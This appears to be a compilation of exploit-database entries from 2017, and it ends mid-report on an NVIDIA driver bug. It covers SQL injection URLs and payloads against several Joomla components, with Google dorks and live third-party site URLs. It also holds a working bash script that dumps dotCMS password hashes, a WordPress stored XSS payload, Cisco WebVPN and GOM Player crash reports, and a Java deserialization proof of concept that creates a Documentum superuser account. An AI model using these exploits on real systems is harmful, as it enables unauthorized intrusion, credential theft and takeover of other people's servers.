# # # # #
# Exploit Title: Joomla! Component Joomloc-CAT v4.1.3 - SQL Injection
# Google Dork: inurl:index.php?option=com_joomloc
# Date: 18.02.2017
# Vendor Homepage: http://www.joomloc.fr.nf/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-cat/
# Demo: http://www.joomloc.fr.nf/joomlocprocmpms/
# Version: 4.1.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joomloc&view=engine&layout=geo&liste=65&place=dep&ville=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component WMT Content Timeline v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_wmt_content_timeline
# Date: 17.02.2017
# Vendor Homepage: http://devecostudio.com
# Software Buy: https://extensions.joomla.org/extensions/extension/news-display/articles-display/wmt-content-timeline/
# Demo: http://joomla.devecostudio.com/9-wmt-content-timeline-joomla-module.html
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_wmt_content_timeline&task=returnArticle&id=[SQL]
# -66666+/*!50000union*/+select+1,2,3,4,5,6,7,8,9,10,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),13,14,15--+-
# # # # #
# # # # #
# Exploit Title: Joomla! Component Groovy Gallery v1.0.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_groovygallery
# Date: 17.02.2017
# Vendor Homepage: http://addonstreet.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/photos-a-images/galleries/groovy-gallery/
# Demo: http://addonstreet.com/products/groovy-gallery
# Version: 1.0.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&filter_category=[SQL]
# http://localhost/[PATH]/index.php?option=com_groovygallery&view=images&groovy_category=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component Team Display v1.2.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_teamdisplay
# Date: 17.02.2017
# Vendor Homepage: http://addonstreet.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/thematic-directory/team-display/
# Demo: http://addonstreet.com/demo/teamdisplay/
# Version: 1.2.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_teamdisplay&view=members&filter_category=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component JEmbedAll v1.4 - SQL Injection
# Google Dork: inurl:index.php?option=com_jembedall
# Date: 16.02.2017
# Vendor Homepage: http://www.goldengravel.eu/
# Software Buy: https://extensions.joomla.org/extensions/extension/core-enhancements/coding-a-scripts-integration/jembedall/
# Demo: http://www.goldengravel.eu/
# Version: 1.4
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jembedall&downloadfree=[SQL]
# http://localhost/[PATH]/index.php?option=com_jembedall&export=articlepdf&id=[SQL]
# # # # #
http://www.goldengravel.eu/index.php?option=com_jembedall&downloadfree=4'
http://www.goldengravel.eu/index.php?option=com_jembedall&export=articlepdf&id=4'
http://www.supravirtual.ro/index.php?option=com_jembedall&downloadfree=4'
http://www.supravirtual.ro/index.php?option=com_jembedall&export=articlepdf&id=4'
# Blind Boolean SQL Injection in dotCMS <= 3.6.1 (CVE-2017-5344)
## Product Description
dotCMS is a scalable, Java-based, open source content management system
(CMS) designed to manage and deliver personalized, permission-based
content experiences across multiple channels. dotCMS can serve as the
platform for sites, mobile apps, mini-sites, portals and intranets, or as a
headless CMS (content is consumed via RESTful APIs). dotCMS is used
everywhere, from running small sites to powering multi-node installations
for governments, Fortune 100 companies, universities and global brands. A
dotCMS environment can scale to support hundreds of editors managing
thousands of sites with millions of content objects.
## Vulnerability Type
Blind Boolean SQL injection
## Vulnerability Description
dotCMS versions up to 3.6.1 (and possibly others) are vulnerable to blind
boolean SQL injection in the q and inode parameters of the
/categoriesServlet path. This servlet is a remotely accessible,
unauthenticated function of default dotCMS installations and can be
exploited to exfiltrate sensitive information from any database accessible
to the DBMS user configured for the product.
In 3.5 - 3.6.1, exploitation is limited to the MySQL DBMS, as SQL escaping
controls were added to address a similar vulnerability discovered in
previous versions of the product. The bypass of these controls that makes
this vulnerability possible has only been successfully tested with MySQL
5.5, 5.6 and 5.7, and it is believed other DBMSes are not affected.
Versions prior to 3.5 do not have these controls and can be exploited
directly on a greater number of paired DBMSes. PostgreSQL is vulnerable in
all described versions of dotCMS when the PostgreSQL
standard_conforming_strings setting is disabled (it is enabled by default).
The vulnerability is the result of string interpolation and direct SQL
statement execution without sanitising user input. The intermediate
resolution for a previous SQLi vulnerability was to whitelist and partially
filter user input before interpolation. This vulnerability bypasses that
filtering to perform blind boolean SQL injection. The resolution to this
vulnerability was to use prepared statements in the affected locations.
This vulnerability has been present in dotCMS since at least version 3.0.
## Exploit
A proof of concept is available here:
https://github.com/xdrr/webapp-exploits/tree/master/vendors/dotcms/2017.01.blind-sqli
## Versions
dotCMS <= 3.3.2 with MySQL, MSSQL, H2 or PostgreSQL
dotCMS 3.5 - 3.6.1 with MySQL, or with PostgreSQL when
standard_conforming_strings is disabled
## Attack Type
Unauthenticated, Remote
## Impact
The SQL injection vulnerability can be used to exfiltrate sensitive
information from the DBMS used with dotCMS. Depending on the DBMS type and
configuration, the issue could be as severe as obtaining a remote shell
(for example via xp_cmdshell on MSSQL servers) or, in the most limited
cases, restricted to exfiltration of data in dotCMS database tables.
## Credit
This vulnerability was discovered by Ben Nott <pajexali@gmail.com>.
Credit goes to Erlar Lang for discovering similar SQL injection
vulnerabilities in nearby code and for inspiring this discovery.
## Disclosure Timeline
* Jan 2, 2017 - Issue discovered.
* Jan 2, 2017 - Vendor advised of discovery and contact requested for
full disclosure.
* Jan 4, 2017 - Provided full disclosure to vendor.
* Jan 5, 2017 - Vendor acknowledged disclosure and confirmed finding
validity.
* Jan 14, 2017 - Vendor advised patch developed and preparing for release.
* Jan 24, 2017 - Vendor advised patching in progress.
* Feb 15, 2017 - Vendor advises ready for public disclosure.
## References
Vendor advisory: http://dotcms.com/security/SI-39
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5344
#!/bin/bash
#
# Dump password hashes from dotCMS <= 3.6.1 using blind boolean SQL injection.
# CVE: CVE-2017-5344
# Author: Ben Nott <pajexali@gmail.com>
# Date: January 2017
#
# Note this exploit is tuned for MySQL backends but can be adapted
# for other DBMSs.
show_usage() {
echo "Usage $0 [target]"
echo
echo "Where:"
echo -e "target\t...\thttp://target.example.com (no trailing slash, port optional)"
echo
echo "For example:"
echo
echo "$0 http://www.examplesite.com"
echo "$0 https://www.mycmssite.com:9443"
echo
exit 1
}
test_exploit() {
target=$1
res=$(curl -k -s -X 'GET' \
-H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0' -H 'Upgrade-Insecure-Requests: 1' \
"${target}/categoriesServlet?q=%5c%5c%27")
if [ $? -ne 0 ];
then
echo "Failed to connect. Check host and try again!"
exit 1
fi
if [ -z "$res" ];
then
echo "The target appears vulnerable. We're good to go!"
else
echo "The target isn't vulnerable."
exit 1
fi
}
dump_char() {
target=$1
char=$2
database=$3
index=$4
offset=$5
column=$6
avg_delay=$7
if [ -z "$offset" ];
then
offset=1
fi
if [[ $char != *"char("* ]];
then
char="%22${char}%22"
fi
if [ -z "$column" ];
then
column="password_"
fi
# Controls the avg delay of a FALSE
# request
if [ -z "$avg_delay" ];
then
avg_delay="0.100"
fi
res=$(curl -k -sS \
-w " %{time_total}" \
-H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0' -H 'Upgrade-Insecure-Requests: 1' \
"${target}/categoriesServlet?q=%5c%5c%27)+OR%2f%2a%2a%2f(SELECT(SUBSTRING((SELECT(${column})FROM(${database}.user_)LIMIT%2f%2a%2a%2f${index},1),${offset},1)))LIKE+BINARY+${char}%2f%2a%2a%2fORDER+BY+category.sort_order%23")
data=$(echo $res | awk '{print $1}')
rtt=$(echo $res | awk '{print $2}')
# Calculate boolean based on time delay and
# data presence.
has_delay=$(echo "${rtt}>${avg_delay}" | bc -l)
if [ ! -z "$data" ];
then
if [ $has_delay -eq 1 ];
then
echo "$char"
fi
fi
}
testdb() {
target=$1
# Both probes must pass an explicit row index and offset: without them the
# injected query becomes "LIMIT ,1", a syntax error that never matches.
res=$(dump_char $target 1 "dotcms" 1 1)
if [ ! -z "$res" ];
then
echo "dotcms"
else
res=$(dump_char $target 1 "dotcms2" 1 1)
if [ ! -z "$res" ];
then
echo "dotcms2"
fi
fi
}
convert_char() {
char=$1
conv="$char"
if [ "$char" == "char(58)" ];
then
conv=":"
elif [ "$char" == "char(47)" ];
then
conv="/"
elif [ "$char" == "char(61)" ];
then
conv="="
elif [ "$char" == "char(45)" ];
then
conv="-"
fi
echo -n "$conv"
}
a2chr() {
a=$1
printf 'char(%02d)' \'$a
}
n2chr() {
n=$1
printf 'char(%d)' $n
}
chr2a() {
chr=$1
chr=$(echo $chr | sed -e 's/char(//g' -e 's/)//g')
chr=`printf \\\\$(printf '%03o' $chr)`
echo -n $chr
}
iter_chars() {
target=$1
db=$2
user=$3
offset=$4
column=$5
for c in {32..36} {38..94} {96..126}
do
c=$(n2chr $c)
res=$(dump_char $target $c $db $user $offset $column)
if [ ! -z "$res" ];
then
chr2a $res
break
fi
done
}
exploit() {
target=$1
db=$(testdb $target)
if [ -z "$db" ];
then
echo "Unable to identify database name used by dotcms instance!"
exit 1
fi
echo "Dumping users and passwords from database..."
echo
for user in $(seq 0 1023);
do
validuser=1
echo -n "| $user | "
for offset in $(seq 1 1024);
do
res=$(iter_chars $target $db $user $offset "userid")
if [ -z "$res" ];
then
if [ $offset -eq 1 ];
then
validuser=0
fi
break
fi
echo -n "$res";
done
if [ $validuser -eq 1 ];
then
printf " | "
else
printf " |\n"
break
fi
for offset in $(seq 1 1024);
do
res=$(iter_chars $target $db $user $offset "password_")
if [ -z "$res" ];
then
break
fi
echo -n "$res";
done
printf " |\n"
done
echo
echo "Dumping complete!"
}
target=$1
if [ -z "$target" ];
then
show_usage
fi
test_exploit $target
exploit $target
# Exploit Title: Authenticated Stored XSS in WordPress Corner-Ad plugin.
# Google Dork: inurl:/wp-content/plugins/corner-ad
# Date: 16-02-17
# Exploit Author: Atik Rahman
# Vendor Homepage: https://wordpress.org/plugins/corner-ad/
# Software Link: https://downloads.wordpress.org/plugin/corner-ad.zip
# Version: 1.0.7
# Tested on: Firefox 44, Windows10
Vendor Description
---------------------
*Corner Ad* is a plugin which displays ads in a corner of your
WordPress website page.
The plugin has 1,000+ active installs.
Stored XSS in Ad Name
----------------------
The Ad Name input field is not properly escaped when it is rendered. This
leads to a stored XSS that affects every user who opens the ad list,
including administrators, editors and other users.
1. Go to http://localhost/wp-admin/options-general.php?page=corner-ad.php
2. Click on the "Create New Ad" button.
3. Use "/><svg/onload=prompt(document.domain)> as the Ad Name and fill in
the other fields.
4. Click on the "Save Corner Ad" button. Once the new ad is saved, go to
http://localhost/wp-admin/options-general.php?page=corner-ad.php
to view the corner ad list. The XSS payload executes there.
5. Any editor or author who visits the corner ad list page is affected
as well.
# # # # #
# Exploit Title: Joomla! Component Spider FAQ Lite v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_spiderfaq
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/faq/spider-faq-lite/
# Demo: http://demo.web-dorado.com/spider-faq.html
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=1&searchform=1&expand=0&Itemid=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component Spider Facebook v1.6.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_spiderfacebook
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/social-web/social-display/spider-facebook/
# Demo: http://demo.web-dorado.com/spider-facebook.html
# Version: 1.6.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spiderfacebook&task=loginwith&name=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component Spider Catalog Lite v1.8.10 - SQL Injection
# Google Dork: inurl:index.php?option=com_spidercatalog
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/spider-catalog-lite/
# Demo: http://demo.web-dorado.com/spider-catalog.html
# Version: 1.8.10
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spidercatalog&product_id=40&view=showproduct&page_num=1&back=1&show_category_details=0&display_type=list&show_subcategories=0&show_subcategories_products=0&show_products=1&select_categories=0&Itemid=[SQL]
# http://localhost/[PATH]/index.php?option=com_spidercatalog&view=spidercatalog&select_categories=[SQL]&show_category_details=1&display_type=cell&show_subcategories=1
# # # # #
# # # # #
# Exploit Title: Joomla! Component Spider Calendar Lite v3.2.16 - SQL Injection
# Google Dork: inurl:index.php?option=com_spidercalendar
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/spider-calendar-lite/
# Demo: http://demo.web-dorado.com/spider-calendar.html
# Version: 3.2.16
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=1&module_id=92&date92=2017-02-3&cat_ids=&Itemid=[SQL]
# Etc...
# # # # #
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=998
The WebVPN http server exposes a way of accessing files from CIFS with a url hook of the form: https://portal/+webvpn+/CIFS_R/share_server/share_name/file.
When a user logged into the portal navigates to such an address, the http_cifs_process_path function parses the request URI and creates two C strings in a http_cifs_context struct:
http_cifs_context:
  +0x160 char* file_dir
  +0x168 char* file_name
These strings are copied in various places, and the copying is done incorrectly. For example, ewaURLHookCifs contains the following pseudocode:
  filename_copy_buf = calloc(1LL, 336LL);
  net_handle[10] = filename_copy_buf;
  if ( filename_copy_buf )
  {
    src_len = _wrap_strlen(filename_from_request);
    if ( filename_from_request[src_len - 1] == ('|') )
    {
      // wrong length (src length)
      strncpy((char *)filename_copy_buf, filename_from_request,
              src_len - 1);
    }
Here a fixed-size buffer (|filename_copy_buf|, 336 bytes) is allocated. Later, strncpy is called to copy into it, but the length passed is the length of the source string, which can be larger than 336 bytes. This leads to a heap overflow.
There appear to be various other places where the copying is done in an unsafe way:
http_cifs_context_to_name, which is called from ewaFile{Read,Write,Get}Cifs, and ewaFilePost, uses strcat to copy the file path and file name to a fixed size (stack) buffer.
http_cifs_pre_fopen, which has a similar issue with passing the length of the src buffer to strncpy.
Possibly http_add_query_str_from_context. There are probably others that I missed.
Note that triggering this bug requires logging in to the WebVPN portal first, but the cifs share does not need to exist.
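The length confusion described above, as an added C example that is not part of the Project Zero report or of Cisco's code: a copy that mirrors the reported pattern (the strncpy bound is derived from the source length, the destination is a fixed 336-byte allocation) beside a copy bounded by the destination. The 336-byte size and the trailing '|' handling come from the pseudocode; the function names, the 500-'A' input modelled on the repro, and the decision to report rather than perform an overflowing copy are this example's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FILENAME_BUF_SIZE 336  /* the calloc(1, 336) in ewaURLHookCifs (from the report) */

/* The reported pattern: the strncpy bound is the SOURCE length (minus one to
 * drop a trailing '|'), so the 336-byte destination is never considered.
 * To keep this demo memory-safe, the copy is performed only when it fits;
 * otherwise the number of bytes that would land past the buffer is returned. */
size_t vulnerable_copy_overrun(char *dst, size_t dst_size, const char *src)
{
    size_t src_len = strlen(src);
    size_t n;
    if (src_len == 0)
        return 0;
    n = (src[src_len - 1] == '|') ? src_len - 1 : src_len;
    if (n > dst_size)
        return n - dst_size;       /* heap overflow by this many bytes */
    strncpy(dst, src, n);          /* also unterminated when n == dst_size */
    return 0;
}

/* Hardened form: the bound comes from the destination, one byte is reserved
 * for the terminator, and an over-long name is rejected, not truncated. */
int safe_copy(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (n > 0 && src[n - 1] == '|')
        n--;
    if (dst_size == 0 || n >= dst_size)
        return -1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* Model the repro: a path component of `len` 'A's. Returns the overrun. */
size_t overrun_for_path(size_t len)
{
    char dst[FILENAME_BUF_SIZE];
    char *src = malloc(len + 1);
    size_t over;
    if (!src)
        return 0;
    memset(src, 'A', len);
    src[len] = '\0';
    over = vulnerable_copy_overrun(dst, sizeof dst, src);
    free(src);
    return over;
}

/* 1 if safe_copy accepts src and yields exactly `expect`, else 0. */
int safe_copy_matches(const char *src, const char *expect)
{
    char dst[FILENAME_BUF_SIZE];
    if (safe_copy(dst, sizeof dst, src) != 0)
        return 0;
    return strcmp(dst, expect) == 0;
}

/* 1 if safe_copy rejects a name of `len` 'A's, else 0. */
int safe_copy_rejects_len(size_t len)
{
    char dst[FILENAME_BUF_SIZE];
    char *src = malloc(len + 1);
    int rejected;
    if (!src)
        return 0;
    memset(src, 'A', len);
    src[len] = '\0';
    rejected = safe_copy(dst, sizeof dst, src) != 0;
    free(src);
    return rejected;
}

int main(void)
{
    printf("500 'A's: vulnerable copy overruns by %zu bytes\n", overrun_for_path(500));
    printf("500 'A's: safe_copy rejects? %d\n", safe_copy_rejects_len(500));
    printf("\"share|\" -> \"share\" via safe_copy? %d\n", safe_copy_matches("share|", "share"));
    return 0;
}
```

The same destination-bounded form applies to the strcat in http_cifs_context_to_name and the strncpy in http_cifs_pre_fopen that the report lists: in each case the bound must be the remaining capacity of the destination, never a length taken from the request.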
Repro:
Login to WebVPN portal, navigate to:
https://portal/+webvpn+/CIFS_R/server/name/ followed by 500 'A's.
("server" and "name" may be passed verbatim)
*** Error in `lina': malloc(): memory corruption: 0x00007fa40c53f570 ***
======= Backtrace: =========
/lib64/libc.so.6(+0x3f0486e74f)[0x7fa4139fc74f]
/lib64/libc.so.6(+0x3f048783ee)[0x7fa413a063ee]
/lib64/libc.so.6(+0x3f0487be99)[0x7fa413a09e99]
/lib64/libc.so.6(__libc_malloc+0x60)[0x7fa413a0b5a0]
lina(+0x321976a)[0x7fa41a2b276a]
lina(mem_mh_calloc+0x123)[0x7fa41a2b4c83]
lina(resMgrCalloc+0x100)[0x7fa419659410]
lina(calloc+0x94)[0x7fa419589a34]
lina(ewsFileSetupFilesystemDoc+0x28)[0x7fa41826a608]
lina(ewsServeFindDocument+0x142)[0x7fa418278192]
lina(ewsServeStart+0x114)[0x7fa4182784a4]
lina(ewsParse+0x19a0)[0x7fa418272cc0]
lina(ewsRun+0x9c)[0x7fa41826955c]
lina(emweb_th+0x6ab)[0x7fa418286aeb]
lina(+0xde58ab)[0x7fa417e7e8ab]
This was tested on 9.6(2)
# # # # #
# Exploit Title: Joomla! Component JSP Store Locator v2.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_jsplocation
# Date: 15.02.2017
# Vendor Homepage: http://joomlaserviceprovider.com
# Software Buy: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/jsplocation/
# Demo: http://demo.joomlaserviceprovider.com/index.php/joomla/extensions/jsp-location-classic-theme
# Version: 2.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jsplocation&task=directionview&id=[SQL]
# http://localhost/[PATH]/index.php?option=com_jsplocation&task=redirectviewinfo&id=[SQL]
# http://localhost/[PATH]/index.php?option=com_jsplocation&view=classic&task=redirectviewinfo&id=[SQL]
# Etc...
# # # # #
# Exploit Title: GOM Player 2.3.10.5266 - Remote heap corruption (.fpx)
# Date: 2017-02-15
# Exploit Author: Peter Baris
# Exploit link: http://www.saptech-erp.com.au/resources/PoC.zip
# Software Link: http://player.gomlab.com/download.gom?language=eng
# CVE: CVE-2017-5881
# Version: 2.3.10.5266
# Tested on: Windows Server 2008 R2 x64, Windows 7 SP1 x64
POC:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41367.zip
Open the malicious fpx file with CTRL+U, served by a webserver:
WinDbg
(864.150): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=092fcde8 ebx=00000000 ecx=41414141 edx=090ff798 esi=090ff790
edi=05b10000
eip=77902fe5 esp=10a9fbb4 ebp=10a9fc94 iopl=0 nv up ei ng nz na pe
cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010287
ntdll!RtlpFreeHeap+0x4d6:
77902fe5 8b19 mov ebx,dword ptr [ecx]
ds:002b:41414141=????????
0:022> !exchain
10a9fc84: ntdll!_except_handler4+0 (77946325)
CRT scope 0, func: ntdll!RtlpFreeHeap+b7d (7795b52d)
10a9fd54: *** WARNING: Unable to verify checksum for C:\Program Files
(x86)\GRETECH\GomPlayer\gvf.ax
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\Program Files (x86)\GRETECH\GomPlayer\gvf.ax -
gvf!DllGetClassObject+5801b (6e02bc7b)
10a9fdcc: gvf!DllGetClassObject+57af8 (6e02b758)
10a9fe00: gvf!DllGetClassObject+57ac8 (6e02b728)
10a9fe84: gvf!DllGetClassObject+57fe0 (6e02bc40)
10a9feac: gvf!DllGetClassObject+5d5e8 (6e031248)
10a9ff60: ntdll!_except_handler4+0 (77946325)
CRT scope 0, filter: ntdll!__RtlUserThreadStart+2e (77946608)
func: ntdll!__RtlUserThreadStart+63 (77948227)
10a9ff80: ntdll!FinalExceptionHandler+0 (779983b1)
Invalid exception stack at ffffffff
2017-02-04 notification sent to developers
2017-02-05 developers requested information about the issue
2017-02-09 information sent with the PoC
no reply if they plan to release a fix or not
/**
CVE Identifier: CVE-2017-5586
Vendor: OpenText
Affected products: Documentum D2 version 4.x
Researcher: Andrey B. Panfilov
Severity Rating: CVSS v3 Base Score: 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Description: Documentum D2 ships vulnerable BeanShell (bsh) and Apache Commons libraries and accepts serialized data from untrusted sources, which leads to remote code execution
Proof of concept:
===================================8<===========================================
*/
import java.io.ByteArrayOutputStream;
import java.io.DataOutputStream;
import java.io.InputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.ArrayList;
import java.util.Comparator;
import java.util.List;
import java.util.PriorityQueue;
import bsh.Interpreter;
import bsh.XThis;
import com.documentum.fc.client.content.impl.ContentStoreResult;
import com.documentum.fc.client.impl.typeddata.TypedData;
/**
* @author Andrey B. Panfilov <andrey (at) panfilov (dot) tel>
*
* Code below creates superuser account in underlying Documentum repository
* usage: java DocumentumD2BeanShellPoc http://host:port/D2 <docbase_name> <user_name_to_create>
*
*/
@SuppressWarnings("unchecked")
public class DocumentumD2BeanShellPoc {
public static void main(String[] args) throws Exception {
String url = args[0];
String docbase = args[1];
String userName = args[2];
String payload = "compare(Object foo, Object bar) {new Interpreter()"
+ ".eval(\"try{com.documentum.fc.client.IDfSession session = com.documentum.fc.impl.RuntimeContext.getInstance()"
+ ".getSessionRegistry().getAllSessions().iterator().next();"
+ "session=com.emc.d2.api.D2Session.getAdminSession(session, false);"
+ "com.documentum.fc.client.IDfQuery query = new com.documentum.fc.client.DfQuery("
+ "\\\"CREATE dm_user object set user_name='%s',set user_login_name='%s',set user_source='inline password', "
+ "set user_password='%s', set user_privileges=16\\\");query.execute(session, 3);} "
+ "catch (Exception e) {}; return 0;\");}";
Interpreter interpreter = new Interpreter();
interpreter.eval(String.format(payload, userName, userName, userName));
XThis x = new XThis(interpreter.getNameSpace(), interpreter);
Comparator comparator = (Comparator) x.getInterface(new Class[] { Comparator.class, });
PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
Object[] queue = new Object[] { 1, 1 };
setFieldValue(priorityQueue, "queue", queue);
setFieldValue(priorityQueue, "size", 2);
// actually we may send priorityQueue directly, but I want to hide
// deserialization stuff from stacktrace :)
Class cls = Class.forName("com.documentum.fc.client.impl.typeddata.ValueHolder");
Constructor ctor = cls.getConstructor();
ctor.setAccessible(true);
Object valueHolder = ctor.newInstance();
setFieldValue(valueHolder, "m_value", priorityQueue);
List valueHolders = new ArrayList();
valueHolders.add(valueHolder);
TypedData data = new TypedData();
setFieldValue(data, "m_valueHolders", valueHolders);
ContentStoreResult result = new ContentStoreResult();
setFieldValue(result, "m_attrs", data);
ByteArrayOutputStream baos = new ByteArrayOutputStream();
DataOutputStream dos = new DataOutputStream(baos);
for (Character c : "SAVED".toCharArray()) {
dos.write(c);
}
dos.write((byte) 124);
dos.flush();
ObjectOutputStream oos = new ObjectOutputStream(baos);
oos.writeObject(result);
oos.flush();
byte[] bytes = baos.toByteArray();
baos = new ByteArrayOutputStream();
dos = new DataOutputStream(baos);
dos.writeInt(bytes.length);
dos.write(bytes);
dos.flush();
HttpURLConnection conn = (HttpURLConnection) new URL(makeUrl(url)).openConnection();
conn.setRequestProperty("Content-Type", "application/octet-stream");
conn.setRequestMethod("POST");
conn.setUseCaches(false);
conn.setDoOutput(true);
conn.getOutputStream().write(baos.toByteArray());
conn.connect();
System.out.println("Response code: " + conn.getResponseCode());
InputStream stream = conn.getInputStream();
byte[] buff = new byte[1024];
int count = 0;
while ((count = stream.read(buff)) != -1) {
System.out.write(buff, 0, count);
}
}
public static String makeUrl(String url) {
if (!url.endsWith("/")) {
url += "/";
}
return url + "servlet/DoOperation?origD2BocsServletName=Checkin&id=1&file=/etc/passwd&file_length=1000"
+ "&_username=dmc_wdk_preferences_owner&_password=webtop";
}
public static Field getField(final Class<?> clazz, final String fieldName) throws Exception {
Field field;
try {
field = clazz.getDeclaredField(fieldName);
} catch (NoSuchFieldException e) {
// getDeclaredField throws instead of returning null, so walk up the hierarchy here
if (clazz.getSuperclass() == null) {
throw e;
}
field = getField(clazz.getSuperclass(), fieldName);
}
field.setAccessible(true);
return field;
}
public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
final Field field = getField(obj.getClass(), fieldName);
field.set(obj, value);
}
}
/**
===================================>8===========================================
Disclosure timeline:
2016.02.28: Vulnerability discovered
2017.01.25: CVE Identifier assigned
2017.02.01: Vendor contacted, no response
2017.02.15: Public disclosure
*/
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1012
DxgkDdiSubmitCommandVirtual is the function implemented by the kernel mode driver
responsible for submitting a command buffer to the GPU. One of the arguments passed
contains vendor specific data from the user mode driver. The kernel allocates a single
buffer for this purpose for all submit calls for the same context.
NVIDIA implements this data as:
struct NvPrivateHeader {
  DWORD magic;
  WORD unknown_4;
  WORD unknown_6;
  DWORD unknown_8;
  DWORD size;
};
struct NvPrivateData {
  NvPrivateHeader header;
  DWORD unknown_0;
  DWORD unknown_1;
  DWORD some_size;
  DWORD unknown_2;
  PVOID a_gpu_address_maybe;
  BYTE unknown[1220];
};
In one of the functions that process this data, there is code that shifts
the contents of this user private data around:
  // |len| is controlled by the user: it can come from the |some_size| field
  // when the |a_gpu_address_maybe| field is 0.
  if ( len ) {
    if ( 8 * len >= pCommand_->DmaBufferPrivateDataSize - 0x4E8 )
      do_debug_thingo(); // doesn't stop the memcpy
    priv_data = (NvSubmitPrivateData *)pCommand_->pDmaBufferPrivateData;
    src = (char *)priv_data + priv_data->header.size; // unchecked length
    priv_data = (NvSubmitPrivateData *)((char *)priv_data + 1256);
    *(_QWORD *)&v4->unknown_0[256] = priv_data;
    // potential bad memcpy
    memcpy(priv_data, src, 8 * len);
  }
There are two main problems here. First, the |len| value is checked, but the
